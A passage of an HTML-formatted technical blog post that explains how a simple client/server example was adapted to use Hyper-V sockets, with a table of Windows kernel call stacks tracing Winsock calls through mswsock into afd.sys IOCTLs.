<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On msdn only one page describes steps which need to be executed to create the application for work with Hyper-V sockets </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/user-guide/make-integration-service)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. As an example, we will take the simple application found in Internet and showing work with standard network sockets, and we modify it so that it for data transmission used sockets of Hyper-V </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">(https://github.com/gerhart01/HyperV-sockets</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. The application consists of a client and server part. Client part transfers the text typed in the console to server, using Hyper-V sockets for communication.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">According to MSDN Hyper-V sockets support the following commands: Socket, Bind, Connect, Send, Listen, Accept.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="75" src="https://lh5.googleusercontent.com/VUv7LoxkiwdAo1CKeimkzRkSmyk7kcpGQrlYzyz-Eh_RpL7kcfGdys5MFV3TQWY3xTkao-RbgQQ2o6QgAfmS2m_axqEImLUoy3mK7K9Ucu2WmiS0F4ow6kzOTURMLFCh9I28tbwnAqSM3cBT8Q" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="138" /></span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However in practice it is visible that the bigger number of commands is supported:</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Server part of the application execute </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">socket, bind, listen, accept, recv, closesocket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Client part - </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">socket, connect, send, recv, shutdown, closesocket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's consider our applcation as there is a work with Hyper-V sockets. At once I will tell that in general interfaces of interaction are very similar to usual network sockets, only realization details differ. </span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In general, the logic of interaction (from the point of view of interaction with windows kernel) looks as follows:</span></div>
<div dir="ltr" style="margin-left: -5.4pt;">
<table style="border-collapse: collapse; border: none;"><colgroup><col width="312"></col><col width="293"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Server</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Client</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Afd!AfdCreate</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtCreateFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1207b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockGetInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12003)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!bind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!bind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdStartListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1200b)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!listen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL – 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!listen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdWaitForListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 1200c)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Afd!AfdCreate</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtCreateFile (</span><a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Afd \\Endpoint</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
